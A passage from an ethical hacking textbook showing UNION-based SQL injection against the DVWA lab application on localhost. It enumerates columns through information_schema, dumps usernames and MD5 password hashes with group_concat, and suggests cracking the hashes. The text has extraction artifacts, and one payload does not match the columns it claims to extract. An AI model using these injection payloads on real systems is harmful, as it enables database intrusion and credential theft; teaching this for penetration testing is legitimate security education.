Extracting Columns from Tables
The next step is to find all the columns in the “users” table. The information_schema.columns
table holds the list of all the columns present in tables of all the databases that user has access to.
The column_name column holds the list of all the columns. So our syntax would be as follows:
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION select 1,2,3,column_name,5,6 from
information_schema.columns where table_schema=“dvwa”--±
350
◾
Ethical Hacking and Penetration Testing Guide
We have managed to extract all the columns available in the “users” table.
Extracting Data from Columns
The final step would be to extract the data present in the column “users,” which will hold the
username, password, and other data about the user. So we will choose to extract the information
from the following columns: first_name, last_name, user, and password.
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION select 1,2,3,column_name,5,6 from
dvwa.users--±
We have managed to retrieve the usernames, passwords, etc., of all the users in the “users”
table. The password is an MD5 hash. You can either use online hash cracking tools to crack the
hashes or use brute forcing, rainbow tables, etc.
Using
group _ concat
In this case, we were able to echo back the data to all the columns. However, in most of the cases,
you won’t be able to print the data to all the columns. In such cases, you can use “
group _ con-
cat
” to extract data from multiple columns at once.
Web Hacking
◾
351
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION select 1,2,3,group_concat(user,0x3a,
password),5,6 from dvwa.users--±
The 0x3a is hex equivalent of “colon [:]”; this is used for formatting the data correctly.
Dostları ilə paylaş: |
